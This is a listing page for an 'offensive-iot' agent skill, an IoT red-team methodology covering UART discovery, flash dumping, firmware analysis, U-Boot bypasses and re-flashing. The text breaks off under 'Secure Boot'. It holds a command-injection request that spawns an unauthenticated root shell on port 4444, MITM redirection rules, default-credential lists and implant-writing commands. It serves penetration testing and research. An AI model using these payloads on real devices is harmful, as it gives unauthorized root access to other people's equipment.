ClaudeWave
Skill · 2.3k repo stars · updated 1mo ago

offensive-iot

offensive-iot is a comprehensive red-team methodology for IoT and embedded device security testing. It documents hardware reconnaissance techniques (identifying debug interfaces like UART and JTAG), firmware acquisition methods (vendor downloads, OTA capture, chip-off desolder), firmware analysis (filesystem extraction, hardcoded credential discovery, vulnerable component identification), bootloader attacks (U-Boot console exploitation, secure-boot bypass), runtime exploitation (default credentials, kernel vulnerability chains), wireless protocol attacks (Zigbee, BLE, LoRaWAN), and IoT protocol exploitation (MQTT, CoAP, Modbus). Use this skill for IoT penetration tests, smart-home security assessments, industrial control system auditing, or embedded vulnerability research.

Install in Claude Code

git clone --depth 1 https://github.com/SnailSploit/Claude-Red /tmp/offensive-iot && cp -r /tmp/offensive-iot/Skills/iot/offensive-iot ~/.claude/skills/offensive-iot
Then open a new Claude Code session; the skill loads automatically.

SKILL.md

# IoT & Embedded — Offensive Testing Methodology

## Quick Workflow

1. **Recon the device physically** — identify SoC, flash, debug interfaces, radios
2. **Get the firmware** — vendor download, OTA capture, hardware dump, or chip-off
3. **Unpack and analyze** — filesystems, services, secrets, default creds, vuln components
4. **Establish runtime access** — UART shell, telnet/SSH default creds, exploit chain
5. **Pivot** — to companion app, cloud API, neighboring devices via mesh / wireless

---

## Hardware Reconnaissance

### PCB Inspection

- ID the **SoC** by markings (Realtek, Mediatek, Espressif, Broadcom, Allwinner, NXP, STM32, etc.)
- ID **flash** (8-pin SOIC = SPI NOR; BGA = eMMC; TSOP = NAND)
- Find **debug headers**: TX/RX/GND/VCC pads (UART); TCK/TMS/TDI/TDO plus GND, usually a 10–20 pin header or unpopulated pads (JTAG); SWDIO/SWCLK plus power, 4 pads (SWD)
- Find test points labeled `TX`, `RX`, `TCK`, `TMS`, `TDO`, `TDI`, `RST`, `BOOT`

### Tools

| Tool | Use |
|------|-----|
| Multimeter | Identify GND, VCC rails before connecting |
| Logic analyzer (Saleae, DSLogic) | Find UART baud, SPI clock, identify protocols |
| USB-UART (FT232, CP2102) | UART console |
| Bus Pirate / Glasgow | UART, SPI, I2C, JTAG generic |
| J-Link / Black Magic Probe | JTAG / SWD MCU debugging |
| CH341A programmer | Cheap SPI flash dumper |
| XGecu T48 | Modern universal programmer (NAND/eMMC/SPI) |
| ChipQuik / hot-air | Chip-off desolder |

### UART Discovery

```bash
# Brute-force the baud rate: capture a few seconds at each common rate,
# power-cycling the board inside each window so the boot banner is emitted
for b in 9600 19200 38400 57600 115200 230400 460800 921600; do
  echo "=== $b ==="
  stty -F /dev/ttyUSB0 "$b" raw -echo
  timeout 5 cat /dev/ttyUSB0 > "uart_$b.log"
done
# Only the right rate produces readable text; the rest is mojibake
grep -l -E "U-Boot|Linux|Bootloader|console|login" uart_*.log
```

Look for: U-Boot console (often `Hit any key` countdown), Linux init messages, root shell on console, login prompt.
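Brute-forcing rates works, but a logic analyzer gives the baud rate deterministically: the shortest interval between two consecutive edges on TX is one bit period. The script below is an added example (not code from the skill or its repository) that reads a CSV of transitions in the shape of a Saleae digital export (`time_seconds,level`, an assumed format) and snaps the measured rate to the nearest standard one; the capture it runs on is constructed, not recorded from a device.

```python
"""Infer a UART baud rate from logic-analyzer edge timestamps.

Added example, not part of the original skill. Input is assumed to be a CSV
of transitions, "time_seconds,level", like a Saleae digital export; the
capture produced by make_sample_capture() is constructed, not recorded.
"""
import csv
import io

STANDARD_BAUDS = (1200, 2400, 4800, 9600, 19200, 38400, 57600, 115200,
                  230400, 460800, 921600, 1500000, 3000000)


def parse_edges(csv_text):
    """Return the timestamps at which the line level changed."""
    edges, last = [], None
    for row in csv.reader(io.StringIO(csv_text)):
        if not row or not row[0][:1].isdigit():
            continue                      # header or blank line
        t, level = float(row[0]), int(row[1])
        if level != last:
            edges.append(t)
            last = level
    return edges


def min_pulse_width(edges):
    """Shortest gap between consecutive edges. A boot log always contains a
    single-bit pulse (a start bit before a 1, 0x55-like bytes), so the
    minimum is one bit time. On a real capture, filter glitches of a few
    hundred ns first, or this returns noise."""
    return min(b - a for a, b in zip(edges, edges[1:]))


def detect_baud(csv_text, tolerance=0.05):
    """Return (standard_baud or None, measured_baud). None means the measured
    rate is more than `tolerance` away from every standard rate, which
    usually indicates a non-standard clock or too slow a sample rate."""
    measured = 1.0 / min_pulse_width(parse_edges(csv_text))
    nearest = min(STANDARD_BAUDS, key=lambda b: abs(b - measured))
    if abs(nearest - measured) / nearest > tolerance:
        return None, measured
    return nearest, measured


def make_sample_capture(baud, data_byte, start=0.001):
    """Constructed capture: one 8N1 frame (idle high, start bit low, LSB
    first, stop bit high) as one transition row per bit slot."""
    bit_time = 1.0 / baud
    bits = [1, 0] + [(data_byte >> i) & 1 for i in range(8)] + [1]
    rows = ["Time [s],Channel 0"]
    for i, level in enumerate(bits):
        rows.append(f"{start + i * bit_time:.9f},{level}")
    return "\n".join(rows) + "\n"


if __name__ == "__main__":
    for rate in (9600, 115200):
        print(rate, detect_baud(make_sample_capture(rate, 0x55)))
```

Feed a real export into `detect_baud()` and then use the returned rate with `stty`/`picocom`; a `None` result with a measured value near a round number (e.g. 100000) means the SoC's UART clock is off-standard and you should configure that exact rate.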

### Bootloader Console Drop

```
# At the U-Boot countdown, hit a key (or the key/string the banner names)
Hit any key to stop autoboot:  0
=> printenv                   # full env, often includes boot args and the flash layout (mtdparts)
=> setenv bootargs ${bootargs} init=/bin/sh
=> boot                       # kernel drops straight into a root shell, no login;
                              # no init scripts run, so mount proc/sysfs yourself and expect no network
```

If U-Boot is locked, try:
- Keyed autoboot (`CONFIG_AUTOBOOT_KEYED` with `CONFIG_AUTOBOOT_STOP_STR` / `CONFIG_AUTOBOOT_DELAY_STR`, or a `bootstopkey` env variable): the stop string is usually recoverable with `strings` on the bootloader region of a flash dump
- `Ctrl+C` / `Ctrl+B` / vendor-specific magic strings
- Glitch the U-Boot version-check / signature-check (see Fault Injection)
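When the console is locked but the flash can be dumped and rewritten, the stored environment is the same lever as `setenv bootargs ... init=/bin/sh`, applied offline. U-Boot's env block is a little-endian CRC32 followed by NUL-separated `KEY=VALUE` strings ending in a double NUL, padded to `CONFIG_ENV_SIZE`; the redundant layout inserts a one-byte flags field after the CRC. The script below is an added example (not code from the skill or its repository) that validates, patches and re-checksums such a block inside a flash image; the env offset, size and contents it uses are constructed demo values, and on a real target they come from `/proc/mtd` or the `mtdparts` variable in `printenv` output.

```python
"""Patch a U-Boot environment block offline in a flash dump.

Added example, not part of the original skill. Env layout: CRC32 (LE) over
the data area, optional flags byte (redundant layout), then "K=V\0...\0\0"
padded to CONFIG_ENV_SIZE. ENV_OFFSET/ENV_SIZE and SAMPLE_ENV are demo
assumptions, not values from any real device.
"""
import struct
import zlib


def parse_env(blob, redundant=False):
    """Validate the CRC and return the environment as a dict."""
    hdr = 5 if redundant else 4
    stored = struct.unpack_from("<I", blob, 0)[0]
    data = blob[hdr:]
    if zlib.crc32(data) & 0xFFFFFFFF != stored:
        raise ValueError("env CRC mismatch: wrong offset/size, or the other "
                         "layout (redundant vs non-redundant)")
    end = data.find(b"\x00\x00")
    if end < 0:
        raise ValueError("no terminating double NUL")
    env = {}
    for entry in data[:end].split(b"\x00"):
        if entry:
            key, _, value = entry.partition(b"=")
            env[key.decode()] = value.decode()
    return env


def build_env(env, size, redundant=False, flags=0):
    """Serialize `env` into a `size`-byte block with a fresh CRC."""
    hdr = 5 if redundant else 4
    body = b"".join(f"{k}={v}".encode() + b"\x00" for k, v in env.items()) + b"\x00"
    if len(body) > size - hdr:
        raise ValueError("environment does not fit in the env partition")
    data = body.ljust(size - hdr, b"\x00")
    crc = struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)
    return crc + (bytes([flags]) if redundant else b"") + data


def patch_flash_env(flash, env_offset, env_size, updates, redundant=False):
    """Return a copy of `flash` with `updates` applied to its env partition."""
    env = parse_env(flash[env_offset:env_offset + env_size], redundant)
    env.update(updates)
    return (flash[:env_offset]
            + build_env(env, env_size, redundant)
            + flash[env_offset + env_size:])


# Constructed demo image: 64 KiB of erased NOR (0xFF) with a 4 KiB env at 0x8000.
ENV_OFFSET, ENV_SIZE = 0x8000, 0x1000
SAMPLE_ENV = {
    "bootcmd": "bootm 0x9f020000",
    "bootargs": "console=ttyS0,115200 root=31:02 rootfstype=squashfs",
    "bootdelay": "0",
}


def make_sample_flash():
    flash = bytearray(b"\xff" * 0x10000)
    flash[ENV_OFFSET:ENV_OFFSET + ENV_SIZE] = build_env(SAMPLE_ENV, ENV_SIZE)
    return bytes(flash)


def demo():
    """Append init=/bin/sh, restore a countdown, and re-parse the result."""
    flash = make_sample_flash()
    old = parse_env(flash[ENV_OFFSET:ENV_OFFSET + ENV_SIZE])
    patched = patch_flash_env(flash, ENV_OFFSET, ENV_SIZE, {
        "bootargs": old["bootargs"] + " init=/bin/sh",
        "bootdelay": "3",
    })
    return parse_env(patched[ENV_OFFSET:ENV_OFFSET + ENV_SIZE]), patched


if __name__ == "__main__":
    env, _ = demo()
    print(env["bootargs"], "| bootdelay =", env["bootdelay"])
```

A CRC mismatch on the first parse almost always means the offset or size is wrong, or the device uses the redundant layout (two env copies, flags byte); try the other layout before assuming the env is encrypted. Write the patched image back with the same `flashrom`/`mtd_debug` path used for the dump.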

---

## Flash Dumping

### SPI NOR (most common consumer IoT)

```bash
# In-circuit dump (hold the SoC in reset so it does not drive the SPI bus)
flashrom -p ch341a_spi -r firmware.bin
flashrom -p ch341a_spi -r firmware2.bin

# Verify: two dumps must match, and binwalk should find real structure
cmp firmware.bin firmware2.bin && file firmware.bin && binwalk firmware.bin
```

If the SoC fights you (bus contention, or the board browning out the programmer's 3.3 V rail): desolder the SPI chip, dump it in a socket, re-solder. Note that stock CH341A boards drive the data lines at 5 V; use a 3.3 V-modded board or a level shifter on 3.3 V flash.

### eMMC / NAND

eMMC is desolder-then-read: a BGA-153/169 to SD adapter (cheap, eBay) presents the chip as an SD-style card to any USB reader, and the dump is usually a normal block-device image with a partition table.

Raw NAND dumps include the OOB/spare area and uncorrected bit errors: strip the OOB and apply the controller's ECC before parsing. On a live device `nanddump` (mtd-utils) does this for you; `yaffshiv`/`ubireader` then parse the resulting YAFFS/UBI images.

### OTA Capture

Many devices fetch firmware over HTTP(S). MITM the device:

```bash
# Captive AP + transparent proxy
sudo create_ap wlan0 eth0 IoTLab
# Redirect the device's HTTP/HTTPS to mitmproxy's transparent listener
sudo iptables -t nat -A PREROUTING -p tcp --dport 80  -j REDIRECT --to-port 8080
sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
mitmproxy --mode transparent --showhost --ssl-insecure
# For non-SNI clients or pinned TLS, use bettercap with custom DNS; even when the
# TLS handshake fails, the DNS query and SNI reveal the update host
```

Capture the URL, download directly, dissect.

---

## Firmware Analysis

### Initial Triage

```bash
binwalk -Me firmware.bin           # Extract recursively (signature scan)
binwalk -E firmware.bin            # Entropy plot: flat near 8 bits/byte = compressed or encrypted
strings -n 8 firmware.bin | grep -iE "(passwd|key|token|admin|http|ssid)"
```

A flat high-entropy region that the signature scan attributes to a known container (LZMA, gzip, xz, SquashFS) is compressed; one with no header at all is the encrypted case, and the key then has to come from the bootloader, a hardware dump or the OTA client.
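The entropy plot alone cannot separate the two flat cases; the header at the start of the region can. The script below is an added example (not code from the skill or its repository) that does a block-entropy scan and labels a high-entropy run as compressed only when it opens with a known container magic, otherwise as possibly encrypted. The image it scans is constructed from four regions (zero padding, ASCII config text, a deterministic SHA-256 chain standing in for ciphertext, and a real gzip stream); the thresholds are assumptions tuned to those regions.

```python
"""Block-entropy scan of a firmware image with header-aware labelling.

Added example, not part of the original skill. Thresholds, magic table and
the sample image are demo assumptions; the image is constructed, not a dump.
"""
import gzip
import hashlib
import math
from collections import Counter

# Magic bytes of containers commonly found in embedded firmware.
MAGICS = [
    (b"\x1f\x8b", "gzip"),
    (b"\xfd7zXZ\x00", "xz"),
    (b"\x5d\x00\x00", "lzma"),
    (b"\x04\x22\x4d\x18", "lz4"),
    (b"\x28\xb5\x2f\xfd", "zstd"),
    (b"hsqs", "squashfs-le"),
    (b"sqsh", "squashfs-be"),
]
HIGH = 7.0      # bits/byte: code, text and filesystem metadata stay well below this
PADDING = 1.0   # erased flash (0xFF) and zero fill score near 0


def shannon_entropy(block):
    n = len(block)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(block).values())


def identify_header(block):
    for magic, name in MAGICS:
        if block.startswith(magic):
            return name
    return None


def scan(image, block_size=4096):
    """Return [(start, end, label)], merging adjacent blocks of one kind.
    A high-entropy block starting with a known header opens a 'compressed'
    region; a headerless one continues the preceding high-entropy region
    (compressed streams carry no per-block headers, so this is an assumption
    about stream extent) or, with nothing before it, opens a 'possibly
    encrypted' region."""
    regions = []
    for off in range(0, len(image), block_size):
        block = image[off:off + block_size]
        h = shannon_entropy(block)
        if h < PADDING:
            label = "padding/empty"
        elif h < HIGH:
            label = "code/text/filesystem"
        else:
            header = identify_header(block)
            if header:
                label = f"compressed ({header})"
            elif regions and regions[-1][2].startswith(("compressed", "high")):
                label = regions[-1][2]
            else:
                label = "high entropy, no known header: possibly encrypted"
        starts_stream = label.startswith("compressed") and identify_header(block)
        if regions and regions[-1][2] == label and not starts_stream:
            regions[-1][1] = off + len(block)
        else:
            regions.append([off, off + len(block), label])
    return [tuple(r) for r in regions]


def pseudo_random(n, seed=b"iot-demo"):
    """Deterministic stand-in for ciphertext: a SHA-256 chain."""
    out, h = b"", seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return out[:n]


def make_sample_image():
    """Constructed image: 4 KiB zeros, 4 KiB config text, 8 KiB 'ciphertext',
    8 KiB of a real gzip stream (truncated to a block multiple for the demo)."""
    zeros = b"\x00" * 4096
    text = ("".join(f"dev eth{i} addr=192.168.1.{i}\n" for i in range(256)) * 4)[:4096].encode()
    cipher = pseudo_random(8192)
    plain = "".join(f"line {i}: v={i * 7919 % 10007}\n" for i in range(40000)).encode()
    packed = gzip.compress(plain, mtime=0)[:8192]
    return zeros + text + cipher + packed


if __name__ == "__main__":
    for start, end, label in scan(make_sample_image()):
        print(f"{start:#08x}-{end:#08x} {label}")
```

Run it on a real dump with `scan(open("firmware.bin", "rb").read())`; the offsets of the first `compressed (...)` region are what you hand to `dd`/`binwalk -e` for extraction, and a "possibly encrypted" region that spans the whole image means there is no point grepping strings until the key is recovered.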

### Filesystem Mounting

```bash
# SquashFS (most consumer Linux IoT)
unsquashfs -d rootfs squashfs.bin

# JFFS2 / UBIFS (NAND-backed)
jefferson jffs2.bin -d rootfs
ubireader_extract_files ubi.bin -o rootfs
```

### Embedded-Linux Quick Wins

```bash
# Hardcoded credentials and keys
grep -RIE "(BEGIN (RSA |DSA |EC )?PRIVATE KEY|api[_-]?key|secret|token|passwd|root:[^*])" rootfs/
find rootfs -name "*.pem" -o -name "*.key" -o -name "shadow"

# Telnet/SSH default creds
cat rootfs/etc/passwd rootfs/etc/shadow
grep -r "telnetd" rootfs/etc/init.d
grep -r "dropbear\|sshd" rootfs/

# Setuid binaries
find rootfs -perm -4000 -type f

# Vulnerable busybox / dropbear / openssl versions (cross-arch binaries: read the
# version strings, don't try to run them on the host)
strings rootfs/bin/busybox | grep -m1 "BusyBox v"
strings rootfs/sbin/dropbear rootfs/usr/sbin/dropbear 2>/dev/null | grep -m1 "Dropbear v"
strings rootfs/usr/lib/libssl* 2>/dev/null | grep -m1 "OpenSSL [0-9]"

# Web admin: lighttpd / mini_httpd / boa / GoAhead — known CVE goldmine
find rootfs -name "lighttpd*" -o -name "boa" -o -name "goahead" -o -name "mini_httpd"
```
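Reading `passwd`/`shadow` by eye misses the cases that matter on routers: an extra UID-0 account, an empty password field, or a hash in `passwd` itself (old BusyBox images without shadow). The script below is an added example (not code from the skill or its repository) that triages both files and reports which accounts will actually authenticate and how cheap their hashes are to crack. The two files embedded in it are constructed samples shaped like a consumer router's, not copied from any device, and the hash strings in them are placeholders, not real digests.

```python
"""Triage passwd/shadow from an extracted rootfs.

Added example, not part of the original skill. SAMPLE_PASSWD/SAMPLE_SHADOW
are constructed; their hash strings are format placeholders only.
"""
import re

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/sh
admin:x:0:0:admin:/:/bin/sh
support:x:0:0:support:/:/bin/sh
telnet:ab12CdEfGh34i:1001:1001:telnet:/:/bin/sh
nobody:x:99:99:nobody:/:/bin/false
"""

SAMPLE_SHADOW = """root:$1$QmRvbkx1$7kz3DDGDGIgFHtQ7LTO2t1:0:0:99999:7:::
admin::0:0:99999:7:::
support:$6$ZsW6oF8p$f7Wb1vX9K2Yh4q5E2cQm3Lz8N6r1T0uB5vY7eA9dC3hJ4kM8nP2sR6wG1xL5zV3bF7jH0tK9yD4gS1qW0e:0:0:99999:7:::
nobody:*:0:0:99999:7:::
"""

# (regex, hash family, crack-cost verdict), ordered most specific first
HASH_KINDS = [
    (r"^\$1\$", "md5crypt", "weak: fast to crack offline"),
    (r"^\$5\$", "sha256crypt", "crack offline (slow hash)"),
    (r"^\$6\$", "sha512crypt", "crack offline (slow hash)"),
    (r"^\$2[abxy]\$", "bcrypt", "crack offline (slow hash)"),
    (r"^\$y\$", "yescrypt", "crack offline (slow hash)"),
    (r"^[./0-9A-Za-z]{13}$", "DES crypt", "weak: 8-char max, fast to crack"),
]


def parse_colon_file(text):
    """Map the first field (username) to the full field list."""
    rows = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            fields = line.split(":")
            rows[fields[0]] = fields
    return rows


def classify_hash(field):
    if field == "":
        return "none", "LOGIN WITHOUT PASSWORD"
    if field.startswith(("*", "!")):
        return "locked", "password login disabled"
    for pattern, kind, verdict in HASH_KINDS:
        if re.match(pattern, field):
            return kind, verdict
    return "unknown", "inspect manually"


def triage(passwd_text, shadow_text):
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    findings = []
    for user, f in passwd.items():
        uid = int(f[2])
        shell = f[6] if len(f) > 6 else ""
        field = f[1]
        if field == "x":
            # "x" defers to shadow; a missing shadow entry behaves like a locked account
            field = shadow[user][1] if user in shadow else "!"
        kind, verdict = classify_hash(field)
        notes = []
        if uid == 0 and user != "root":
            notes.append("UID 0")
        if shell.endswith(("/false", "/nologin")):
            notes.append("no shell")
        findings.append({"user": user, "uid": uid, "shell": shell,
                         "hash": kind, "verdict": verdict, "notes": notes})
    return findings


def loginable(findings):
    """Accounts login(1) will accept. Note busybox telnetd started with
    `-l /bin/sh` ignores the passwd shell field entirely."""
    return [f["user"] for f in findings
            if f["hash"] != "locked" and "no shell" not in f["notes"]]


if __name__ == "__main__":
    for f in triage(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{f['user']:<8} uid={f['uid']:<4} {f['hash']:<12} {f['verdict']} {f['notes']}")
```

Point it at `rootfs/etc/passwd` and `rootfs/etc/shadow` (or `etc/passwd-` and `etc/default/` copies, which vendors often leave behind with older hashes). Every md5crypt/DES hash goes straight to hashcat with a router wordlist; an empty field or a second UID-0 user is a finding on its own.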

### CGI / Web Admin Auditing

GoAhead, Boa and mini_httpd builds in IoT firmware are usually years-old vendor forks; their CGI handlers concatenate request parameters straight into shell commands, so command injection is endemic.

```bash
# Identify a CGI
file rootfs/www/cgi-bin/setup.cgi     # usually a plain MIPS/ARM ELF
# Headless import into a Ghidra project (./ghidra_proj/iot_cgi), then open it in the GUI;
# analyzeHeadless lives in Ghidra's support/ directory
analyzeHeadless ./ghidra_proj iot_cgi -import rootfs/www/cgi-bin/setup.cgi
```

Common patterns:
- `system()` / `popen()` with concatenated query string args
- `sprintf` then `system` — easy command injection
- Auth check via comparing cookie to plaintext file (race / replay)

---

## Runtime Exploitation

### Console / Telnet Default Creds

Try (per device class): `admin/admin`, `root/root`, `root/<empty>`, `admin/password`, `support/support`, `cisco/cisco`, vendor brand as user/pass. **Always try `root/<serial number>`** — many vendors use a per-device default.

### Web Admin Command Injection

```http
POST /goform/setSysAdm HTTP/1.1
Cookie: SESSIONID=...
Content-Type: application/x-www-form-urlencoded

admin_user=admin&admin_pwd=password;telnetd -l /bin/sh -p 4444;
```

URL-encode the payload in a real request (`;` as `%3B`, spaces as `+`); the injected BusyBox `telnetd -l /bin/sh -p 4444` binds an unauthenticated root shell on port 4444.

### MTD Writes (re-flash from runtime)

If you have a root shell:

```bash
cat /proc/mtd          # list partitions, sizes and erasesize
# Erase length must be a whole number of erase blocks; check the partition
# is not read-only (MTD_RO flag) and never touch the bootloader partition
mtd_debug erase /dev/mtd2 0 0x10000
mtd_debug write /dev/mtd2 0 0x10000 implant.bin
```
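The two numbers that brick boards here are the erase length and the target partition. The script below is an added example (not code from the skill or its repository) that parses `/proc/mtd`, rounds the erase up to whole erase blocks, refuses misaligned or out-of-bounds writes, and emits the `mtd_debug` commands. The `/proc/mtd` text is constructed (a typical SPI-NOR layout), and the protected-partition list and `implant.bin` name are assumptions.

```python
"""Plan an MTD write from /proc/mtd, checking erase-block alignment.

Added example, not part of the original skill. SAMPLE_PROC_MTD is
constructed; the protected partition names are a demo assumption.
"""
import re

SAMPLE_PROC_MTD = """dev:    size   erasesize  name
mtd0: 00030000 00010000 "u-boot"
mtd1: 00010000 00010000 "u-boot-env"
mtd2: 00200000 00010000 "kernel"
mtd3: 00d70000 00010000 "rootfs"
mtd4: 00040000 00010000 "config"
mtd5: 00010000 00010000 "art"
"""

LINE = re.compile(r'^(mtd\d+):\s+([0-9a-f]+)\s+([0-9a-f]+)\s+"([^"]*)"')


def parse_proc_mtd(text):
    """Map partition name -> (device, size, erasesize), sizes in bytes."""
    parts = {}
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            parts[m.group(4)] = (m.group(1), int(m.group(2), 16), int(m.group(3), 16))
    return parts


def plan_write(parts, name, offset, payload_len, payload="implant.bin",
               protect=("u-boot", "u-boot-env", "art")):
    """Return [erase_cmd, write_cmd] for writing payload_len bytes at `offset`
    inside partition `name`, or raise if the write would be unsafe.
    'art' holds the radio calibration on Atheros boards; losing it kills Wi-Fi."""
    if name not in parts:
        raise KeyError(f"no partition named {name!r}")
    if name in protect:
        raise ValueError(f"{name} is protected: overwriting it bricks the board")
    dev, size, erasesize = parts[name]
    if offset % erasesize:
        raise ValueError(f"offset {offset:#x} is not aligned to erasesize {erasesize:#x}")
    erase_len = -(-payload_len // erasesize) * erasesize      # round up to whole blocks
    if offset + erase_len > size:
        raise ValueError(f"write of {erase_len:#x} at {offset:#x} exceeds partition size {size:#x}")
    return [f"mtd_debug erase /dev/{dev} {offset:#x} {erase_len:#x}",
            f"mtd_debug write /dev/{dev} {offset:#x} {payload_len:#x} {payload}"]


if __name__ == "__main__":
    layout = parse_proc_mtd(SAMPLE_PROC_MTD)
    for cmd in plan_write(layout, "kernel", 0, 70000):
        print(cmd)
```

On the device, `cat /proc/mtd` into this script before writing; if the partition you need is in the protected list, that is a deliberate decision to make with a full flash backup in hand, not a default.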

### /dev/mem

On kernels built without `CONFIG_STRICT_DEVMEM` (common in vendor BSPs), `/dev/mem` gives read/write access to all physical memory, so any root context can patch the running kernel or pull keys straight out of RAM: full system compromise.

---

## Bootloader / Secure Boot Attacks

### U-Boot Quick Bypasses

- `setenv bootargs ${bootargs} init=/bin/sh`
- `setenv preboot '<u-boot command>'` then `saveenv` (U-Boot runs `preboot` before the autoboot countdown on every boot; it takes U-Boot commands, not Linux shell commands)
- `tftpboot` — load an attacker-controlled kernel or ramdisk from a TFTP server on the lab network
- `bootm` a memory-resident image you uploaded over UART with `loadb` (kermit) or `loady`

### Secure Boot

Modern devices verify signed bootloaders / kernels. By